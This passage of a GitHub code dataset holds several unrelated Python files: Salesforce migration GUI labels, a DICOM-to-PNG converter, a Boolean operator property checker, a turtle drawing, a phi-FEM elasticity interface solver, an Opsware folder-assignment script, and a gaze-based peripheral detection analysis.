SCRIPT'\nSELECT_OBJECT_LABEL = 'SELECT OBJECT'\nRUN_SCRIPT_BTN = 'Execute Script'\nSHOW_LOGS_BTN = 'show logs'\nSHOW_FILES_BTN = 'show files'\nSHOW_USERS_BTN = 'Locate Users'\nSHOW_CREDS_BTN = 'Locate Creds'\n\n# DO NOT CHANGE THIS\nscript_options = [\n 'SELECT',\n 'EXTRACT',\n 'INSERT'\n]\n\ndefault_objects = [\n 'SELECT Object'\n]\n\nextraction_objects = [\n \"Contact\",\n \"User\",\n \"PermissionSetAssignment\",\n \"GEIDP_Customer_App_Role_Access__c\",\n \"Contact_Additional_Information__c\",\n \"GEIDPUsersFromManualRegFlow__c\",\n \"GEIDP_Entitled_Feature__c\",\n \"ALL OBJECTS\"\n]\n\ninsertion_objects = [\n \"Contact\",\n \"User\",\n \"PermissionSetAssignment\",\n \"GEIDP_Customer_App_Role_Access__c\",\n \"Contact_Additional_Information__c\",\n \"GEIDPUsersFromManualRegFlow__c\",\n \"GEIDP_Entitled_Feature__c\",\n]\n\ntext1 = 'STEPS'\ntext2 = 'Click on Locate Creads :\\n \\tupdate creds json files'\ntext3 = 'Click on Locate Users :\\n \\tupdate user_emails.py'\ntext4 = 'Restart the application'\ntext5 = 'Select Script Type'\ntext6 = 'Select Object'\ntext7 = 'Click on Execute Script'\ntext8 = 'check logs and files'\ntext9 = 'Go slow!!!'\n\ntext_lst = [text1,text2,text3,text4,text5,text6,text7,text8,text9]","repo_name":"mithileshjoshi100/salesforce-data-migration","sub_path":"app/gui/magic_strings.py","file_name":"magic_strings.py","file_ext":"py","file_size_in_byte":1341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"19994165242","text":"# for SIIM-ACR dataset\r\nimport os\r\nimport cv2\r\nimport pydicom\r\nimport numpy as np\r\nimport skimage.transform as transform\r\n\r\ndef dcm2jpeg(file, dst_path):\r\n print('FIle:', file)\r\n ds = pydicom.dcmread(file, force=True)\r\n # ds.file_meta.TransferSyntaxUID =\r\n # ds.file_meta.TransferSyntaxUID = pydicom.uid.ImplicitVRLittleEndian\r\n ori_img = np.array(ds.pixel_array)\r\n\r\n sharp = ori_img.shape\r\n _h = sharp[0]\r\n _w = sharp[1]\r\n if len(sharp) == 3:\r\n ori_img = ori_img[:, :, 0]\r\n img = transform.resize(ori_img, (_h, _w))\r\n\r\n start = img.min()\r\n end = img.max()\r\n\r\n img[img < start] = start\r\n img[img > end] 
= end\r\n img = np.array((img - start) * 255.0 / (end - start))\r\n if hasattr(ds, 'PhotometricInterpretation'):\r\n if ds.PhotometricInterpretation == 'MONOCHROME1':\r\n img = 255 - img\r\n\r\n # img_name = os.path.basename(file).lower()\r\n # jpeg_path = str(ds.PatientID) + '_' + str(ds.SeriesDate) + '_' + str(ds.PatientSex) + '_'+str(ds.PatientAge) + '%d' % idx + '.jpeg'\r\n jpeg_name = os.path.basename(file).replace('.dcm', '.png')\r\n save_path = os.path.join(dst_path, jpeg_name)\r\n print(save_path)\r\n\r\n img = img.astype(np.uint8)\r\n cv2.imwrite(save_path, img, [int(cv2.IMWRITE_JPEG_QUALITY), 90])\r\n print('save ok')\r\n return jpeg_name\r\n\r\n\r\ndef do_convert(file_path, png_folder):\r\n try:\r\n jpeg_path = dcm2jpeg(file_path, png_folder)\r\n\r\n except Exception as e:\r\n print('main process has error:%s' % e)\r\n\r\n\r\ndef run():\r\n ini_folder = '/sda1/zhouziyu/ssl/dataset/siim-acr-pneumothorax-segmentation/pneumothorax/dicom-images-train'\r\n jpeg_folder = '/sda1/zhouziyu/ssl/dataset/siim-acr-pneumothorax-segmentation/pneumothorax/png-images-train'\r\n for root, dirs, files in os.walk(ini_folder):\r\n for file in files:\r\n print(file)\r\n file_path = os.path.join(root, file)\r\n\r\n print('_pro' in file)\r\n if '_pro' in file:\r\n continue\r\n if file.lower().endswith('dcm') or file.lower().endswith('dicom'):\r\n do_convert(file_path, jpeg_folder)\r\n print('ok')\r\n\r\nif __name__ == '__main__':\r\n run()\r\n","repo_name":"Zhouziyuya/Benchmark","sub_path":"utils_zzy/dcm2jpeg_simple.py","file_name":"dcm2jpeg_simple.py","file_ext":"py","file_size_in_byte":2211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"27925452705","text":"#!/bin/python\nfrom itertools import product\n\nopNames = {\n (False, False, False, False): 'Constant False',\n (False, False, False, True): 'AND',\n (False, False, True, False): 'NOT p Implies q',\n (False, False, True, True): 'p',\n (False, True, False, False): 'NOT p Implied By q',\n (False, True, False, True): 'q',\n (False, True, True, False): 'XOR',\n (False, True, True, True): 'OR',\n (True, False, False, False): 'NOR',\n (True, False, False, True): 'XNOR',\n (True, False, True, False): 'NOT q',\n (True, False, True, True): 'p Implied by q',\n (True, True, False, False): 'NOT p',\n (True, True, False, True): 'p Implies q',\n (True, True, True, False): 'NAND',\n (True, True, True, True): 'Constant True'\n}\n\nisCommutative = {}\nisAssociative = {}\n\ndef makeOp(ff, ft, tf, tt):\n return lambda x, y: (tt if y else tf) if x else (ft if y else ff)\n\ndef truthTable(n):\n return product([False, True], repeat=n)\n\ndef commutative():\n for ff, ft, tf, tt in truthTable(4):\n op = makeOp(ff, ft, tf, tt)\n\n found = False\n\n x, y = False, True\n xy = op(x, y)\n yx = op(y, x)\n if xy != yx:\n print(f'Not commutative: {opNames[(ff, ft, tf, tt)]} {x} * {y} != {y} * {x}')\n found = True\n \n isCommutative[(ff, ft, tf, tt)] = not found\n if not found:\n print(f'Commutative: {opNames[(ff, ft, tf, tt)]}')\n\ndef associative():\n for ff, ft, tf, tt in truthTable(4):\n op = makeOp(ff, ft, tf, tt)\n\n found = False\n\n for x, y, z in truthTable(3):\n xy_z = op(op(x, y), z)\n x_yz = op(x, op(y, z))\n if xy_z != x_yz:\n print(f'Not associative: {opNames[(ff, ft, tf, tt)]} ({x} * {y}) * {z} != {x} * ({y} * {z})')\n found = True\n\n isAssociative[(ff, ft, tf, tt)] = not found\n if not found:\n print(f'Associative: {opNames[(ff, ft, tf, tt)]}')\n\nif __name__ == '__main__':\n commutative()\n 
associative()\n for key in truthTable(4):\n print(f'{opNames[key]}\\t{isCommutative[key]}\\t{isAssociative[key]}')\n","repo_name":"djohn833/code-snippets","sub_path":"logic/BoolAssocBinOp.py","file_name":"BoolAssocBinOp.py","file_ext":"py","file_size_in_byte":2132,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"}
{"seq_id":"33752264308","text":"# 350111\n# a5_p1.py\n# Amish Kapri\n# a.kapri@jacobs-university.de\n\n\nlist1 = []\nnumber = int(input(\"Enter list length \"))\nprint(\"Enter number\")\nwhile len(list1) != number:\n data = float(input())\n list1.append(data)\n print(list1)\nValue = 1.5\ndef add(list1, Value):\n # add Value to each element of the list\n for i in range(0, number):\n list1[i] = list1[i] + Value\n return list1\ndef multiply(list1, Value):\n # multiply each element of the list by Value\n for i in range(0, number):\n list1[i] = list1[i] * Value\n return list1\n\nprint(add(list1, Value))\nprint(multiply(list1, Value))\n","repo_name":"amishkapri/Python","sub_path":"a5_p1.py","file_name":"a5_p1.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"}
{"seq_id":"24845335363","text":"# Eduardo Nunes\nfrom turtle import *\n\nscreen = Screen()\nscreen.setup(900, 850)\npensize(3)\ncolor(\"black\", \"yellow\")\nspeed(5)\npenup()\n\n\n# UNFINISHED\n\ndef desenhar(raio):\n # main square\n goto(-raio, -raio)\n pendown()\n begin_fill()\n for x in range(4):\n forward(raio * 2)\n left(90)\n end_fill()\n penup()\n\n # circles\n rcirculo = (-raio * 0.75)\n color(\"black\", \"black\")\n goto(0, 0)\n for x in range(3):\n pendown()\n begin_fill()\n if x == 0:\n forward(rcirculo)\n left(90)\n circle(rcirculo, 60)\n left(90)\n forward(rcirculo)\n\n elif x == 1:\n left(60)\n forward(rcirculo)\n right(90)\n circle(-rcirculo, 60)\n right(90)\n forward(rcirculo)\n\n elif x == 2:\n left(60)\n forward(rcirculo)\n left(90)\n circle(rcirculo, 60)\n\n end_fill()\n penup()\n\n # center circle\n color(\"yellow\", \"black\")\n goto(0, -raio*0.15)\n setheading(0)\n\n begin_fill()\n pendown()\n circle(raio * 0.15)\n end_fill()\n penup()\n\n\ndesenhar(150)\nhideturtle()\ndone()\n","repo_name":"PolpEdu/AulaIPRP","sub_path":"Exercicios IPRP da aula prática/Capitulo 2/2.17.py","file_name":"2.17.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"}
{"seq_id":"3086966394","text":"#docker pull multiphenics/multiphenics\n#sudo docker run --shm-size=15g --cpus=8 -ti -v $(pwd):/home/fenics/shared multiphenics/multiphenics\nimport dolfin as df \nimport matplotlib.pyplot as plt \nimport mshr\nfrom matplotlib import rc, rcParams\nimport multiphenics as mph\nimport time\n\n# plot parameters\nplt.style.use('bmh') \nparams = {'axes.labelsize': 'large',\n 'font.size': 22,\n 'axes.titlesize': 'large',\n 'legend.fontsize': 18,\n 'figure.titlesize': 24,\n 'xtick.labelsize': 18,\n 'ytick.labelsize': 18,\n 'figure.figsize':(10,8), \n 'legend.shadow': True,\n 'patch.edgecolor': 'black'}\nplt.rcParams.update(params)\n\n# dolfin parameters\ndf.parameters[\"ghost_mode\"] = \"shared_facet\" \ndf.parameters[\"form_compiler\"][\"cpp_optimize\"] = True\ndf.parameters[\"form_compiler\"][\"optimize\"] = True\ndf.parameters['allow_extrapolation'] = True\ndf.parameters[\"form_compiler\"][\"representation\"] = 'uflacs'\n\n\n\n \n\n# degree of interpolation for V and Vphi\ndegV = 2\ndegPhi = 1 + degV \n\n\n# elastic parameters\nE1 = 7.0\nnu1 = 0.3\nlambda_1 = E1*nu1/((1.0+nu1)*(1.0-2.0*nu1))\nmu1 = 
E1/(2.0*(1.0+nu1))\nE2 = 2.28\nnu2 = 0.3\nlambda_2 = E2*nu2/((1.0+nu2)*(1.0-2.0*nu2))\nmu2 = E2/(2.0*(1.0+nu2))\n\n# size of the circle in the domain\nR = 0.3\n\n# expression of phi\nclass phi_expr(df.UserExpression) : \n def eval(self, value, x):\n value[0] = -R**2 + (x[0]-0.5)**2 + (x[1] - 0.5)**2 \n\n def value_shape(self):\n return (1,)\n\n# functions and parameters for elasticity\ndef sigma1(u):\n return lambda_1 * df.div(u)*df.Identity(2) + 2.0*mu1*epsilon(u)\n\ndef sigma2(u):\n return lambda_2 * df.div(u)*df.Identity(2) + 2.0*mu2*epsilon(u)\n\ndef epsilon(u):\n return (1.0/2.0)*(df.grad(u) + df.grad(u).T)\n\n\n\nclass sol_exact(df.UserExpression):\n def eval(self, value, x):\n r = pow(pow(x[0]-0.5,2) + pow(x[1] - 0.5,2),0.5)\n a = df.as_vector((df.cos(r)-df.cos(R), df.cos(r)-df.cos(R) ))\n if r 0.0 or phi(v2.point()) > 0.0 or phi(v3.point()) > 0.0 \n or df.near(phi(v1.point()),0.0) or df.near(phi(v2.point()),0.0) or df.near(phi(v3.point()),0.0)):\n Cell[cell] = omega2 \n cell_sub[cell] = 1\n for facett in df.facets(cell):\n Facet[facett] = omega2 \n facet_sub[facett] = 1\n v1, v2 = df.vertices(facett)\n vertices_sub[v1], vertices_sub[v2] = 1,1\n File2 = df.File(\"omega2.rtc.xml/mesh_function_2.xml\")\n File2 << cell_sub\n File1 = df.File(\"omega2.rtc.xml/mesh_function_1.xml\")\n File1 << facet_sub\n File0 = df.File(\"omega2.rtc.xml/mesh_function_0.xml\")\n File0 << vertices_sub\n Omega2 = mph.MeshRestriction(mesh,\"omega2.rtc.xml\")\n\n # creation of the restricition for the interface\n cell_sub.set_all(0)\n facet_sub.set_all(0)\n vertices_sub.set_all(0)\n for cell in df.cells(mesh): \n for facet in df.facets(cell): \n v1,v2 = df.vertices(facet) \n if(phi(v1.point())*phi(v2.point()) < 0.0 or df.near(phi(v1.point())*phi(v2.point()), 0.0)): \n Cell[cell] = interf\n cell_sub[cell] = 1\n for facett in df.facets(cell): \n Facet[facett] = interf\n facet_sub[facett] = 1\n v1, v2 = df.vertices(facett)\n vertices_sub[v1], vertices_sub[v2] = 1,1\n \n File2 = df.File(\"interface.rtc.xml/mesh_function_2.xml\")\n File2 << cell_sub\n File1 = df.File(\"interface.rtc.xml/mesh_function_1.xml\")\n File1 << facet_sub\n File0 = df.File(\"interface.rtc.xml/mesh_function_0.xml\")\n File0 << vertices_sub\n Interface = mph.MeshRestriction(mesh,\"interface.rtc.xml\")\n \n for cell in df.cells(mesh):\n if Cell[cell] == omega2 :\n for facet in df.facets(cell) :\n if Facet[facet] == interf :\n Facet[facet] = gamma1\n\n if Cell[cell] == omega1 :\n for facet in df.facets(cell) :\n if Facet[facet] == interf :\n Facet[facet] = gamma2 \n \n # creation of the spaces \n V = df.VectorFunctionSpace(mesh, 'CG', degV, dim=2)\n Z = df.TensorFunctionSpace(mesh,\"CG\",degV, shape = (2,2))\n if degV == 1:\t\n Q = df.VectorFunctionSpace(mesh,\"DG\",degV, dim = 2)\n else:\n Q = df.VectorFunctionSpace(mesh,\"CG\",degV, dim = 2)\n W = mph.BlockFunctionSpace([V,V,Z,Z,Q], restrict=[Omega1, Omega2, Interface, Interface, Interface])\n uyp = mph.BlockTrialFunction(W)\n (u1, u2, y1, y2, p) = mph.block_split(uyp)\n vzq = mph.BlockTestFunction(W)\n (v1, v2, z1, z2, q) = mph.block_split(vzq)\n \n # modification of the measures\n dx = df.Measure(\"dx\", mesh, subdomain_data = Cell)\n ds = df.Measure(\"ds\", mesh, subdomain_data = Facet)\n dS = df.Measure(\"dS\", mesh, subdomain_data = Facet)\n \n # parameters for the considered case\n gamma_div, gamma_u, gamma_p, gamma_y, sigma_p = 10.0, 10.0, 10.0, 10.0, 0.1\n h = df.CellDiameter(mesh)\n n = df.FacetNormal(mesh) \n\n V_ex = df.VectorFunctionSpace(mesh, 'CG', degV+2, dim=2)\n u_ex = 
sol_exact(element = V_ex.ufl_element())\n f = f_exact()\n\n u_ex = df.interpolate(u_ex, V_ex)\n u_D = u_ex \n \n # DG for the interface\n DG0 = df.FunctionSpace(mesh,'DG',0)\n w = df.Function(DG0)\n for c in range(mesh.num_cells()):\n mycell = df.Cell(mesh,c)\n for facet in df.facets(mycell): \n vert1,vert2 = df.vertices(facet) \n if(phi(vert1.point())*phi(vert2.point()) < 0.0 or df.near(phi(vert1.point())*phi(vert2.point()), 0.0)): \n w.vector()[c] = 1.0\n\n # Construction of the bilinear and linear forms\n start_assemble = time.time()\n Gh1 = sigma_p*df.avg(h)*df.inner(df.jump(sigma1(u1),n), df.jump(sigma1(v1),n))*(dS(interf)+dS(gamma2)) \n Gh2 = sigma_p*df.avg(h)*df.inner(df.jump(sigma2(u2),n), df.jump(sigma2(v2),n))*(dS(interf)+dS(gamma1))\n \n au1v1 = df.inner(sigma1(u1), epsilon(v1))*(dx(omega1) + dx(interf)) + Gh1 \\\n + gamma_p*h**(-2)*df.inner(u1,v1)*dx(interf) \\\n + gamma_u*df.inner(sigma1(u1), sigma1(v1))*dx(interf) \n au1z1 = gamma_u*df.inner(sigma1(u1), z1)*dx(interf)\n au1v2 = -gamma_p*h**(-2)*df.inner(u1,v2)*dx(interf)\n au1q = gamma_p*h**(-3)*df.inner(u1,q*phi)*dx(interf)\n \n au2v1 = -gamma_p*h**(-2)*df.inner(u2,v1)*dx(interf)\n au2v2 = df.inner(sigma2(u2), epsilon(v2))*(dx(omega2) + dx(interf)) + Gh2 \\\n + gamma_p*h**(-2)*df.inner(u2,v2)*dx(interf) \\\n + gamma_u*df.inner(sigma2(u2), sigma2(v2))*dx(interf) \n au2z2 = gamma_u*df.inner(sigma2(u2), z2)*dx(interf)\n au2q = -gamma_p*h**(-3)*df.inner(u2,q*phi)*dx(interf)\n \n ay1v1 = (w(\"+\")*df.inner(df.dot(y1(\"+\"),n(\"+\")),v1(\"+\"))+w(\"-\")*df.inner(df.dot(y1(\"-\"),n(\"-\")),v1(\"-\")))*dS(gamma1) + gamma_u*df.inner(y1,sigma1(v1))*dx(interf)\n ay1z1 = gamma_div*df.inner(df.div(y1),df.div(z1))*dx(interf) + gamma_u*df.inner(y1,z1)*dx(interf) \\\n + gamma_y*h**(-2)*df.inner(df.dot(y1,df.grad(phi)),df.dot(z1,df.grad(phi)))*dx(interf)\n ay1z2 = - gamma_y*h**(-2)*df.inner(df.dot(y1,df.grad(phi)),df.dot(z2,df.grad(phi)))*dx(interf)\n\n ay2v2 = (w(\"+\")*df.inner(df.dot(y2(\"+\"),n(\"+\")),v2(\"+\"))+w(\"-\")*df.inner(df.dot(y2(\"-\"),n(\"-\")),v2(\"-\")))*dS(gamma2) + gamma_u*df.inner(y2,sigma2(v2))*dx(interf)\n ay2z1 = -gamma_y*h**(-2)*df.inner(df.dot(y2,df.grad(phi)),df.dot(z1,df.grad(phi)))*dx(interf) \n ay2z2 = gamma_div*df.inner(df.div(y2),df.div(z2))*dx(interf) \\\n + gamma_u*df.inner(y2,z2)*dx(interf) \\\n + gamma_y*h**(-2)*df.inner(df.dot(y2,df.grad(phi)),df.dot(z2,df.grad(phi)))*dx(interf)\n\n apv1 = gamma_p*h**(-3)*df.inner(p*phi,v1)*dx(interf)\n apv2 = -gamma_p*h**(-3)*df.inner(p*phi,v2)*dx(interf)\n apq = gamma_p*h**(-4)*df.inner(p*phi,q*phi)*dx(interf)\n \n lv1 = df.dot(f,v1)*(dx(omega1) + dx(interf)) \n lv2 = df.dot(f,v2)*(dx(omega2) + dx(interf)) \n lz1 = gamma_div * df.inner(f,df.div(z1))*dx(interf) \n lz2 = gamma_div * df.inner(f,df.div(z2))*dx(interf) \n\n A = [[au1v1, au1v2, au1z1, 0.0, au1q], \n [au2v1, au2v2, 0.0, au2z2, au2q],\n [ay1v1, 0.0, ay1z1, ay1z2, 0.0],\n [0.0, ay2v2, ay2z1, ay2z2, 0.0],\n [apv1, apv2, 0.0, 0.0, apq]]\n L = [lv1, lv2, lz1, lz2, 0.0]\n\n AA = mph.block_assemble(A)\n LL = mph.block_assemble(L)\n # definition of the Dirichlet conditions (top, bottom, left and right sides of the square)\n def boundary(x, on_boundary):\n return on_boundary and (df.near(x[0], 0.0) or df.near(x[0], 1.0) or df.near(x[1],1.0) or df.near(x[1],0.0))\n bc2 = mph.DirichletBC(W.sub(1), u_D, boundary) # apply DirichletBC on Omega2\n bcs = mph.BlockDirichletBC([bc2])\n bcs.apply(AA)\n bcs.apply(LL)\n UU = mph.BlockFunction(W)\n mph.block_solve(AA, UU.block_vector(), LL)\n end_solve = time.time()\n\n # Solution 
on Omega1\n u_h1 = df.project(UU[0], V)\n # Solution on Omega2\n u_h2 = df.project(UU[1], V) \n\n\n # Compute and store relative error for H1 and L2 norms\n relative_error_L2_phi_fem = df.assemble(df.inner(u_ex-u_h1,u_ex-u_h1)*dx(1)+df.inner(u_ex-u_h2,u_ex-u_h2)*dx(2))/df.assemble(df.inner(u_ex,u_ex)*dx(1)+df.inner(u_ex,u_ex)*dx(2))\n relative_error_L2_phi_fem = df.sqrt(relative_error_L2_phi_fem)\n print(\"Relative error L2 phi FEM : \",relative_error_L2_phi_fem)\n error_l2_phi_fem.append(relative_error_L2_phi_fem) \n relative_error_H1_phi_fem = df.assemble(df.inner(df.grad(u_ex-u_h1),df.grad(u_ex-u_h1))*dx(1)+df.inner(df.grad(u_ex-u_h2),df.grad(u_ex-u_h2))*dx(2))/df.assemble(df.inner(df.grad(u_ex),df.grad(u_ex))*dx(1) + df.inner(df.grad(u_ex),df.grad(u_ex))*dx(2)) \n relative_error_H1_phi_fem = df.sqrt(relative_error_H1_phi_fem)\n error_h1_phi_fem.append(relative_error_H1_phi_fem) \n print(\"Relative error H1 phi FEM : \",relative_error_H1_phi_fem)\n time_phi_fem.append(end_solve-start_assemble)\n print(\"time standard FEM : \",end_solve-start_assemble)\n\n\n# Computation of the standard FEM \ndomain = mshr.Rectangle(df.Point(0.0, 0.0), df.Point(1.0, 1.0)) # creation of the domain\ndomain.set_subdomain(1, mshr.Circle(df.Point(0.5,0.5),R)) \ntime_standard, error_l2_standard, error_h1_standard, hh_standard = [], [],[],[]\nfor i in range(start, end, step):\n H = 8*2**(i) # to have approximately the same precision as in the phi-fem computation\n mesh = mshr.generate_mesh(domain,H)\n print(\"Standard fem iteration : \", i)\n # FunctionSpace P1\n V = df.VectorFunctionSpace(mesh, 'CG', degV, dim=2)\n u = df.TrialFunction(V)\n v = df.TestFunction(V)\n n = df.FacetNormal(mesh)\n boundary = 'on_boundary '\n\n V_ex = df.VectorFunctionSpace(mesh, 'CG', degV+2, dim=2)\n u_ex = sol_exact(element = V_ex.ufl_element())\n f = f_exact()\n V_phi = df.FunctionSpace(mesh, \"CG\", degPhi)\n phi = phi_expr(element = V_phi.ufl_element())\n\n # initialization of mesh functions to create Omega1, Omega2 and the boundaries\n omega1, omega2 = 1, 2\n mesh.init(1,2) \n Cell = df.MeshFunction(\"size_t\", mesh, mesh.topology().dim()) \n Cell.set_all(0)\n \n # creation of Omega1 (including the interface)\n for cell in df.cells(mesh) :\n if(phi(cell.midpoint())) < 0.0:\n Cell[cell] = omega1 \n else:\n Cell[cell] = omega2 \n dx = df.Measure(\"dx\", mesh, subdomain_data = Cell)\n\n\n \n # Boundary conditions\n u_D = u_ex \n bc = df.DirichletBC(V, u_D, boundary)\n\n # Variationnal problem\n a = df.inner(sigma1(u), epsilon(v))*dx(omega1) +df.inner(sigma2(u), epsilon(v))*dx(omega2) \n L = df.dot(f,v)*df.dx \n start_assemble = time.time()\n A = df.assemble(a)\n B = df.assemble(L)\n end_assemble = time.time()\n u = df.Function(V)\n bc.apply(A,B) # apply Dirichlet boundary conditions to the problem \n start_solve = time.time()\n df.solve(A, u.vector(), B)\n end_solve = time.time()\n u = df.project(u, V_ex)\n u_ex = df.project(u_ex, V_ex)\n dx_ex = df.Measure(\"dx\", mesh)\n\n # Compute and store h and L2 H1 errors\n hh_standard.append(mesh.hmax())\n relative_error_L2_standard_fem = df.sqrt(df.assemble((df.inner(u_ex-u,u_ex-u)*dx_ex)))/df.sqrt(df.assemble((df.inner(u_ex,u_ex))*dx_ex))\n error_l2_standard.append(relative_error_L2_standard_fem) \n print(\"Relative error L2 standard FEM : \",relative_error_L2_standard_fem)\n relative_error_H1_standard_fem = df.sqrt(df.assemble((df.inner(df.grad(u_ex-u),df.grad(u_ex-u))*dx_ex)))/df.sqrt(df.assemble((df.inner(df.grad(u_ex),df.grad(u_ex)))*dx_ex))\n 
error_h1_standard.append(relative_error_H1_standard_fem) \n print(\"Relative error H1 standard FEM : \",relative_error_H1_standard_fem)\n time_standard.append(end_solve-start_assemble)\n print(\"time standard FEM : \",end_solve-start_assemble)\n\n\n# Function used to write in the outputs files\ndef output_latex(f,A,B):\n\tfor i in range(len(A)):\n\t\tf.write('(')\n\t\tf.write(str(A[i]))\n\t\tf.write(',')\n\t\tf.write(str(B[i]))\n\t\tf.write(')\\n')\n\tf.write('\\n')\n\n\n# Write the output file for latex\nf = open('outputs/outputs_elasticity_interface_P{name0}.txt'.format(name0=degV),'w')\nf.write('(E_1, nu_1, lambda_1, mu_1) = ( ' + str(E1) + ', ' + str(nu1) + ', ' + str(lambda_1) + ', ' + str(mu1) + ') \\n') \t\nf.write('(E_2, nu_2, lambda_2, mu_2) = ( ' + str(E2) + ', ' + str(nu2) + ', ' + str(lambda_2) + ', ' + str(mu2) + ') \\n')\nf.write('relative L2 norm phi fem: \\n')\t\noutput_latex(f, hh_phi_fem, error_l2_phi_fem)\nf.write('relative H1 norm phi fem : \\n')\t\noutput_latex(f, hh_phi_fem, error_h1_phi_fem)\nf.write('time standard : \\n')\t\noutput_latex(f, error_l2_standard, time_standard)\nf.write('relative L2 norm standard fem: \\n')\t\noutput_latex(f, hh_standard, error_l2_standard)\nf.write('relative H1 norm standard fem : \\n')\t\noutput_latex(f, hh_standard, error_h1_standard)\nf.write('time phi fem : \\n')\t\noutput_latex(f, error_l2_phi_fem, time_phi_fem)\nf.close()\n","repo_name":"michelduprez/phi-FEM-an-efficient-simulation-tool-using-simple-meshes-for-problems-in-structure-mechanics","sub_path":"Phi_Fem_Interface.py","file_name":"Phi_Fem_Interface.py","file_ext":"py","file_size_in_byte":16433,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"} +{"seq_id":"72705377016","text":"import sys\nfrom coglib import spinwrapper\nfrom opsware_common import errors\n\nspin = spinwrapper.SpinWrapper(url=\"http://127.0.0.1:1007\")\n\nif ( len(sys.argv) != 3 ):\n sys.stdout.write(\"Usage: %s \\n\" % sys.argv[0])\n sys.exit(1)\n\nunit_id = long(sys.argv[1])\nfolder_id = long(sys.argv[2])\n\n# Verify unit exists.\nif ( len(spin.Unit.getIDList(restrict={'unit_id':unit_id})) == 0 ):\n sys.stdout.write(\"Unit %s not found.\\n\" % repr(unit_id))\n sys.exit(1)\n\n# Verify folder exists.\nif ( len(spin.Folder.getIDList(restrict={'folder_id':folder_id})) == 0 ):\n sys.stdout.write(\"Folder %s not found.\\n\" % repr(folder_id))\n sys.exit(1)\n\nfus = spin._FolderUnit.getAll(restrict={'unit_id':unit_id})\nif ( len(fus) == 0 ):\n # Create a new _FolderUnit record:\n sys.stdout.write(\"Moving folderless unit %d into folder %d.\\n\" % (unit_id, folder_id))\n spin._FolderUnit.new(folder_id=folder_id, unit_id=unit_id, link_type_name=\"HARD LINK\")\nelse:\n fu = fus[0]\n old_folder_id = fu[\"folder_id\"]\n if ( old_folder_id != folder_id ):\n sys.stdout.write(\"Moving unit %d from folder %d to folder %d.\\n\" % (unit_id, old_folder_id, folder_id))\n fu.delete()\n spin._FolderUnit.new(folder_id=folder_id, unit_id=unit_id, link_type_name=\"HARD LINK\")\n else:\n sys.stdout.write(\"Unit %d already exists in folder %d.\\n\" % (unit_id, folder_id))\n\n","repo_name":"tsvtln/SA","sub_path":"sa_specific/tools/infra/put_unit_in_folder.py","file_name":"put_unit_in_folder.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"} +{"seq_id":"479312673","text":"import numpy as np\nimport pandas as pd\nimport scipy.special\nimport scipy.optimize\nimport matplotlib.pyplot as 
plt\n\nHORIZONTAL_FOV = 80\nHORIZONTAL_PIX = 1920\nDEGREES_PER_PIX = HORIZONTAL_FOV/HORIZONTAL_PIX\n\ndef get_detection_data():\n data = pd.read_parquet('../preprocessing/gaze_and_target.parquet')\n\n detections = []\n for (p, t), td in data.groupby(['participant_id', 'trial_number']):\n failure = False\n success = False\n \n #target_idxs = np.flatnonzero((td.signtype.values == 'target') & (td.is_visible))\n target_idxs = np.flatnonzero((td.signtype.values == 'mask') & (td.is_visible))\n #target_idxs2 = np.flatnonzero((td.signtype.values == 'target') & (td.is_visible))\n \n if len(target_idxs) == 0:\n continue\n\n # Using just the first moment of target occurence, could use\n # average of all frames with the target present, but this is such\n # a brief moment, it probably makes no difference\n target_i = target_idxs[0]\n\n signs = td.signtype.unique()\n if 'success' in signs:\n success = True\n if 'failure' in signs:\n failure = True\n\n assert not (success and failure)\n if not (success or failure): continue\n \n row = td.iloc[target_i].copy()\n row['success'] = success\n detections.append(row)\n \n dets = pd.DataFrame.from_records(detections)\n pixcols = ['target_x', 'target_y', 'gaze_screen_x', 'gaze_screen_y']\n dets[pixcols] = dets[pixcols]*DEGREES_PER_PIX\n screen_extent = np.array([1920, 1080]).reshape(1, -1)*DEGREES_PER_PIX\n\n dets['target_radius'] = np.linalg.norm(dets[['target_x', 'target_y']].values - screen_extent/2, axis=1)\n print(dets.query(\"scenario == 'swing'\").target_radius.mean())\n dets['target_gaze_distance'] = np.linalg.norm(dets[['target_x', 'target_y']].values - dets[['gaze_screen_x', 'gaze_screen_y']].values, axis=1)\n\n return dets\n\ndef mafc_logit(m):\n def func(x):\n c = (x*m - 1)/(m - 1)\n return scipy.special.logit(c)\n return func\n\nclass LogisticDetection:\n def __init__(self, slope, intercept, p0=1/4):\n self.slope = slope\n self.intercept = intercept\n self.p0 = p0\n\n def __call__(self, x):\n pred = x*self.slope + self.intercept\n p = scipy.special.expit(pred)\n return p + self.p0*(1 - p)\n\n def logpdf(self, x, success):\n p = self(x)\n return np.log(p**success * (1-p)**(1-success))\n\ndef fit_detection(x, success):\n # Just a simple logistic regression\n def loss(param):\n return -np.sum(LogisticDetection(*param).logpdf(x, success))\n \n # Nelder-Mead is good enough for lme4, so we can blame them if\n # this gives bad results.\n fit = scipy.optimize.minimize(loss, [0.0, 0.0], method='Nelder-Mead')\n fit.model = LogisticDetection(*fit.x)\n\n return fit\n\ndef plot_detection_data():\n # TODO: Do this in (approx) view degrees!\n dets = get_detection_data()\n \n dets = dets.query(\"scenario == 'peripheralVisionTest'\")\n #dets = dets.query(\"scenario == 'swing'\")\n #dets = dets.query(\"confidence > 0.9\")\n \n for part, dets in dets.groupby('participant_id'):\n #for dets in [dets]:\n #print(dets.target_radius.unique())\n binshares = []\n for bin, bind in dets.groupby(pd.qcut((dets.target_gaze_distance), 5)):\n #for bin, bind in dets.groupby(dets.target_radius.round()):\n #print(bin)\n binshares.append((bin.mid, bind.success.mean()))\n \n binshares = np.array(binshares)\n plt.plot(binshares[:,0], binshares[:,1], 'o-', label=part)\n plt.axhline(0.25, color='black', label=\"Chance\")\n plt.title(\"Peripheral vision test\")\n plt.xlabel(\"Target displacement from gaze\")\n plt.ylabel(\"Success rate\")\n plt.legend()\n plt.show()\n\ndef fit_detection_data():\n # TODO: Do this in (approx) 